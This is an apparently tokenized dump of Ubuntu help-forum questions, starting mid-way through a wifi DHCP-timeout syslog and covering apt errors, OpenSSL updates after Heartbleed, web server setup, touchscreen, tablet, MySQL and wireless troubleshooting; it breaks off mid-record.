avahi-daemon [ 1040 ] : registering new address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1.* . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) starting connection 'md2014' apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1/wireless ) : access point 'md2014 ' has security , but secrets are required . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1/wireless ) : connection 'md2014 ' has security , and secrets exist . no new secrets needed . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > config : added 'ssid ' value 'md2014' apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > config : added 'scan_ssid ' value '1' apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > config : added 'psk ' value ' < omitted > ' apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > config : set interface ap_scan to 1 apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : supplicant interface state : disconnected - > scanning apr 10 14:14:04 me-inspiron-n4010 wpa_supplicant [ 1307 ] : eth1 : trying to associate with c0 : a8 : d8:8b:84 : a3 ( ssid='md2014 ' freq=2437 mhz ) apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : supplicant interface state : scanning - > associating apr 10 14:14:04 me-inspiron-n4010 wpa_supplicant [ 1307 ] : eth1 : associated with c0 : a8 : d8:8b:84 : a3 apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : supplicant interface state : associating - > 4-way handshake apr 10 14:14:04 me-inspiron-n4010 wpa_supplicant [ 1307 ] : eth1 : wpa : key negotiation completed with c0 : a8 : d8:8b:84 : a3 [ ptk=ccmp gtk=ccmp ] apr 10 14:14:04 me-inspiron-n4010 wpa_supplicant [ 1307 ] : eth1 : ctrl-event-connected - connection to c0 : a8 : d8:8b:84 : a3 completed ( reauth ) [ id=0 id_str= ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : supplicant interface state : 4-way handshake - > completed apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'md2014 ' . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > dhclient started with pid 12539 apr 10 14:14:04 me-inspiron-n4010 avahi-daemon [ 1040 ] : withdrawing address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1 . apr 10 14:14:04 me-inspiron-n4010 avahi-daemon [ 1040 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 10 14:14:04 me-inspiron-n4010 avahi-daemon [ 1040 ] : interface eth1.ipv6 no longer relevant for mdns . apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . apr 10 14:14:04 me-inspiron-n4010 dhclient : internet systems consortium dhcp client 4.2.4 apr 10 14:14:04 me-inspiron-n4010 dhclient : copyright 2004-2012 internet systems consortium . apr 10 14:14:04 me-inspiron-n4010 dhclient : all rights reserved . apr 10 14:14:04 me-inspiron-n4010 dhclient : for info , please visit https : //www.isc.org/software/dhcp/ apr 10 14:14:04 me-inspiron-n4010 dhclient : apr 10 14:14:04 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : dhcpv4 state changed nbi - > preinit apr 10 14:14:05 me-inspiron-n4010 dhclient : listening on lpf/eth1/10 : a1 : d1:8f:44:33 apr 10 14:14:05 me-inspiron-n4010 dhclient : sending on lpf/eth1/10 : a1 : d1:8f:44:33 apr 10 14:14:05 me-inspiron-n4010 dhclient : sending on socket/fallback apr 10 14:14:05 me-inspiron-n4010 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 3 ( xid=0x5a9f1c79 ) apr 10 14:14:06 me-inspiron-n4010 avahi-daemon [ 1040 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 10 14:14:06 me-inspiron-n4010 avahi-daemon [ 1040 ] : new relevant interface eth1.ipv6 for mdns . apr 10 14:14:06 me-inspiron-n4010 avahi-daemon [ 1040 ] : registering new address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1.* . apr 10 14:14:07 me-inspiron-n4010 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 4 ( xid=0x5a9f1c79 ) apr 10 14:14:11 me-inspiron-n4010 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 10 ( xid=0x5a9f1c79 ) apr 10 14:14:21 me-inspiron-n4010 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 11 ( xid=0x5a9f1c79 ) apr 10 14:14:32 me-inspiron-n4010 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 16 ( xid=0x5a9f1c79 ) apr 10 14:14:48 me-inspiron-n4010 dhclient : dhcpdiscover on eth1 to 255.255.255.255 port 67 interval 17 ( xid=0x5a9f1c79 ) apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < warn > ( eth1 ) : dhcpv4 request timed out . apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : canceled dhcp transaction , dhcp client pid 12539 apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) scheduled ... apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) started ... apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : ip-config - > failed ( reason 'ip-config-unavailable ' ) [ 70 120 5 ] apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < warn > activation ( eth1 ) failed for connection 'md2014' apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv4 configure timeout ) complete . apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : device state change : failed - > disconnected ( reason 'none ' ) [ 120 30 0 ] apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : deactivating device ( reason 'none ' ) [ 0 ] apr 10 14:14:50 me-inspiron-n4010 avahi-daemon [ 1040 ] : withdrawing address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1 . apr 10 14:14:50 me-inspiron-n4010 avahi-daemon [ 1040 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 10 14:14:50 me-inspiron-n4010 avahi-daemon [ 1040 ] : interface eth1.ipv6 no longer relevant for mdns . apr 10 14:14:50 me-inspiron-n4010 wpa_supplicant [ 1307 ] : eth1 : ctrl-event-disconnected bssid=00:00:00:00:00:00 reason=0 apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.104006 ] cfg80211 : calling crda to update world regulatory domain apr 10 14:14:50 me-inspiron-n4010 networkmanager [ 1166 ] : < info > ( eth1 ) : supplicant interface state : completed - > disconnected apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111229 ] cfg80211 : world regulatory domain updated : apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111239 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111246 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111253 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111258 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111264 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:14:50 me-inspiron-n4010 kernel : [ 51692.111270 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 10 14:14:52 me-inspiron-n4010 avahi-daemon [ 1040 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 10 14:14:52 me-inspiron-n4010 avahi-daemon [ 1040 ] : new relevant interface eth1.ipv6 for mdns . apr 10 14:14:52 me-inspiron-n4010 avahi-daemon [ 1040 ] : registering new address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1.* . after setting ipv4 address manually in my connection , sudo tail -f /var/log/syslog displays : apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229651 ] cfg80211 : world regulatory domain updated : apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229659 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229665 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229669 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229674 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229678 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 15 15:09:02 me-inspiron-n4010 kernel : [ 16423.229682 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) apr 15 15:09:03 me-inspiron-n4010 avahi-daemon [ 1093 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 15 15:09:03 me-inspiron-n4010 avahi-daemon [ 1093 ] : new relevant interface eth1.ipv6 for mdns . apr 15 15:09:03 me-inspiron-n4010 avahi-daemon [ 1093 ] : registering new address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1.* . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) starting connection 'md2014' apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : disconnected - > prepare ( reason 'none ' ) [ 30 40 0 ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1/wireless ) : access point 'md2014 ' has security , but secrets are required . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : config - > need-auth ( reason 'none ' ) [ 50 60 0 ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) scheduled ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) started ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : need-auth - > prepare ( reason 'none ' ) [ 60 40 0 ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) scheduled ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 1 of 5 ( device prepare ) complete . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) starting ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : prepare - > config ( reason 'none ' ) [ 40 50 0 ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1/wireless ) : connection 'md2014 ' has security , and secrets exist . no new secrets needed . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > config : added 'ssid ' value 'md2014' apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > config : added 'scan_ssid ' value '1' apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > config : added 'key_mgmt ' value 'wpa-psk' apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > config : added 'psk ' value ' < omitted > ' apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 2 of 5 ( device configure ) complete . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > config : set interface ap_scan to 1 apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : supplicant interface state : disconnected - > scanning apr 15 15:09:11 me-inspiron-n4010 wpa_supplicant [ 8119 ] : eth1 : trying to associate with c0 : a8 : d8:8b:84 : a3 ( ssid='md2014 ' freq=2412 mhz ) apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : supplicant interface state : scanning - > associating apr 15 15:09:11 me-inspiron-n4010 wpa_supplicant [ 8119 ] : eth1 : associated with c0 : a8 : d8:8b:84 : a3 apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : supplicant interface state : associating - > 4-way handshake apr 15 15:09:11 me-inspiron-n4010 wpa_supplicant [ 8119 ] : eth1 : wpa : key negotiation completed with c0 : a8 : d8:8b:84 : a3 [ ptk=ccmp gtk=ccmp ] apr 15 15:09:11 me-inspiron-n4010 wpa_supplicant [ 8119 ] : eth1 : ctrl-event-connected - connection to c0 : a8 : d8:8b:84 : a3 completed ( reauth ) [ id=0 id_str= ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : supplicant interface state : 4-way handshake - > completed apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'md2014 ' . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) beginning ip6 addrconf . apr 15 15:09:11 me-inspiron-n4010 avahi-daemon [ 1093 ] : withdrawing address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1 . apr 15 15:09:11 me-inspiron-n4010 avahi-daemon [ 1093 ] : leaving mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 15 15:09:11 me-inspiron-n4010 avahi-daemon [ 1093 ] : interface eth1.ipv6 no longer relevant for mdns . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . apr 15 15:09:11 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 commit ) started ... apr 15 15:09:11 me-inspiron-n4010 avahi-daemon [ 1093 ] : joining mdns multicast group on interface eth1.ipv4 with address 192.168.100.101 . apr 15 15:09:11 me-inspiron-n4010 avahi-daemon [ 1093 ] : new relevant interface eth1.ipv4 for mdns . apr 15 15:09:11 me-inspiron-n4010 avahi-daemon [ 1093 ] : registering new address record for 192.168.100.101 on eth1.ipv4 . apr 15 15:09:12 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] apr 15 15:09:12 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 commit ) complete . apr 15 15:09:12 me-inspiron-n4010 networkmanager [ 8109 ] : < info > ( eth1 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] apr 15 15:09:12 me-inspiron-n4010 networkmanager [ 8109 ] : < info > writing dns information to /sbin/resolvconf apr 15 15:09:12 me-inspiron-n4010 dnsmasq [ 8123 ] : setting upstream servers from dbus apr 15 15:09:12 me-inspiron-n4010 dnsmasq [ 8123 ] : using nameserver 192.168.100.1 # 53 apr 15 15:09:12 me-inspiron-n4010 dnsmasq [ 8123 ] : using nameserver 192.168.100.1 # 53 apr 15 15:09:12 me-inspiron-n4010 networkmanager [ 8109 ] : < info > activation ( eth1 ) successful , device activated . apr 15 15:09:12 me-inspiron-n4010 dbus [ 988 ] : [ system ] activating service name='org.freedesktop.nm_dispatcher ' ( using servicehelper ) apr 15 15:09:12 me-inspiron-n4010 dbus [ 988 ] : [ system ] successfully activated service 'org.freedesktop.nm_dispatcher' apr 15 15:09:13 me-inspiron-n4010 avahi-daemon [ 1093 ] : joining mdns multicast group on interface eth1.ipv6 with address fe80 : :72f1 : a1ff : fe4f:8427 . apr 15 15:09:13 me-inspiron-n4010 avahi-daemon [ 1093 ] : new relevant interface eth1.ipv6 for mdns . apr 15 15:09:13 me-inspiron-n4010 avahi-daemon [ 1093 ] : registering new address record for fe80 : :72f1 : a1ff : fe4f:8427 on eth1 . * .
446406	security objectives	new to linux new to ubuntu objective : better understanding security ubuntu 12.04 lts hello , i am going through the security guide on ubuntu documentation , and i am getting demotivated fast . i think the reason is because i have no understanding of what type of threats are possible towards me . so blindly following tutorials without any objective of my own is getting boring . to give you an idea of my understanding ; how does the existence of ports cause threats ? and even if this question is answered i would n't know what else to look out for . what i would like your help in is suggested reading , to start someone on taking control of their own security . to understand the scope of the battle field and identify what will effect me . the documentation should be technical in nature to properly understand cause and effect . if you can also categorize using the following genres : global information on threats beginners information on threats/security interim advance thank you ,
446412	my ubuntu desktop did not download updates	my ubuntu desktop could not download update and give out this massage : - e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/security.ubuntu.com_ubuntu_dists_precise-security_main_binary-i386_packages , e : the package lists or status file could not be parsed or opened .
446418	heartbleed ubuntu 13.04 stuck on openssl 1.0.1c	just noticed that my ubuntu 13.04 install is stuck on an old version of openssl . openssl 1.0.1 14 mar 2012 the distro is fully to to date , running apt-get update , then apt-get upgrade or apt-get dist-upgrade now gives me the following . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . what am i missing to get the openssl package to update ?
446420	make a ubuntu serverâ ready for takeoff as a webserver	what are the necessary steps to make an ubuntu server ready for productive operation as a webserver ? i 've assumed that the server distro of ubuntu does n't have to be further tweaked to make it ready for productive operation as a webserver ( nginx in my case ) . however , though ready enough there are some things that need to be set up . what i 've learned to do are : set swappiness = 0 increase max number of open files for the webserver my knowledge ends here ... what are the other parameter that i have to consider for a successful productive operation of a webserver ?
446421	disabling touch screen only temporary	i have a problem in that my touch screen is cracked , and so the mouse moves to continually click up and down the crack , which means i can get very little done on my laptop unless i 'm in the bios . not super helpful . i have tried the xinput disable 'elan touchscreen ' command , and even the one specific to the input number ( though it should make no difference ) , yet whenever i do this , the screen re-enables after only a few seconds . is there some way to disable the screen permanently until i decide to turn it on ( when i finally go to fix it ) ?
446424	how to reset all packages and dependencies in ubuntu 12.04 ?	i just installed python3 and set it as the default python version , but after that i 'm facing many dependency problems . i 've now removed python 3 and reinstalled 2.7 . how should i set or reinstall all packages and dependencies in ubuntu 12.04 , like a factory reset ?
446431	need help to install ubuntu	i downloaded ubuntu 13.10 iso file . i mounted it and it asked for reboot . after reboot windows started normally . every time its just asks for reboot and does nothing .
446434	13.10 graphics tablet recognized but not working	i 'm using genius i608x tablet and in 13.10 it is recognized by name with lsusb also gimp recognizes the tablet but the mouse pointer is not moving . i can click on stuff so i guess the buttons are working but i ca n't move the cursor . i 'm looking for solutions since ever , there were some wizardpen drivers with support for these tablets but it 's old . to be able to use ubuntu for something more than browsing internet i need my space navigator and tablet . 3dconnexion is working fine but i have no clue on how to make the tablet work .
446438	how to install opencv blobs in ubuntu 13.10	i 'm trying to install blobs package on ubuntu 13.10 . but i 'm not able to install opencv blobs . i 'm getting the error like from package from blobs.blobresult import cblobresult importerror : no module named blobs.blobresult how do i install the blobs package ?
446440	how to connect to wireless networks in ubuntu ?	there are no wireless connections appearing in the first place to connect to them . and even the wireless is enabled . what do you suggest me ? the following are the outputs i got after running them ... grep -i network 08:00.0 network controller : broadcom corporation bcm4313 802.11bgn wireless network adapter ( rev 01 ) iwconfig eth0 no wireless extensions . eth1 ieee 802.11abg essid : off/any mode : managed access point : not-associated retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . ifconfig eth0 link encap : ethernet hwaddr 10:60:4b : d7:09:0c inet addr:192.168.1.143 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : fe80 : :1260:4bff : fed7:90c/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:256010 errors:0 dropped:0 overruns:0 frame:0 tx packets:161282 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:357837950 ( 357.8 mb ) tx bytes:13655048 ( 13.6 mb ) eth1 link encap : ethernet hwaddr 08:3e:8e:0e:50:31 inet6 addr : fe80 : :a3e:8eff : fe0e:5031/64 scope : link up broadcast multicast mtu:1500 metric:1 rx packets:0 errors:0 dropped:0 overruns:0 frame:0 tx packets:0 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:0 ( 0.0 b ) tx bytes:0 ( 0.0 b ) interrupt:17 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:4403 errors:0 dropped:0 overruns:0 frame:0 tx packets:4403 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:461901 ( 461.9 kb ) tx bytes:461901 ( 461.9 kb )
446441	mysql problem with login in terminal	i read many post including https : //help.ubuntu.com/community/mysqlpasswordreset this one one all of method . how much time i do this i do n't know . still my problem was't fixed . i already wasted 6 more hour for installing mysql . still it shows : sohel @ sohel : ~ $ mysql -u root -p enter password : error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : yes ) //when i try with this sohel @ sohel : ~ $ 140411 18:37:31 [ warning ] using unique option prefix key_buffer instead of key_buffer_size is deprecated and will be removed in a future release . please use the full name instead . mysql -u root error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) //so i use another way , purge then repeat the same problem what should i do now plz help someone .if i reinstall ubuntu will solve this problem . is any file missing is my system ?
446442	wifi connects but no internet after upgrading to 13.10	i upgraded my ubuntu-studio 13.10 yesterday ( via do-release-upgrade ) from 12.04 . now my wireless does n't work properly : i can see the wireless networks and the pc can connect , but internet just wo n't work . internet works fine with wired connection . i know there 's other questions with similar problems , but none of the solutions have worked for me . here 's some system info that may be relevant : ifconfig : eth0 link encap : ethernet hwaddr 88 : ae:1d:88 : d2:00 up broadcast multicast mtu:1500 metric:1 rx packets:6286 errors:0 dropped:0 overruns:0 frame:0 tx packets:6576 errors:5 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4230091 ( 4.2 mb ) tx bytes:1316641 ( 1.3 mb ) interrupt:16 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:65536 metric:1 rx packets:1776 errors:0 dropped:0 overruns:0 frame:0 tx packets:1776 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:139508 ( 139.5 kb ) tx bytes:139508 ( 139.5 kb ) wlan0 link encap : ethernet hwaddr 70 : f1 : a1 : a9 : c3:59 inet addr:192.168.0.196 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :72f1 : a1ff : fea9 : c359/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:426 errors:0 dropped:0 overruns:0 frame:0 tx packets:1211 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:33461 ( 33.4 kb ) tx bytes:128967 ( 128.9 kb ) lspci : 00:00.0 host bridge : intel corporation core processor dram controller ( rev 02 ) 00:01.0 pci bridge : intel corporation core processor pci express x16 root port ( rev 02 ) 00:16.0 communication controller : intel corporation 5 series/3400 series chipset heci controller ( rev 06 ) 00:1a.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1b.0 audio device : intel corporation 5 series/3400 series chipset high definition audio ( rev 05 ) 00:1c.0 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 1 ( rev 05 ) 00:1c.1 pci bridge : intel corporation 5 series/3400 series chipset pci express root port 2 ( rev 05 ) 00:1d.0 usb controller : intel corporation 5 series/3400 series chipset usb2 enhanced host controller ( rev 05 ) 00:1e.0 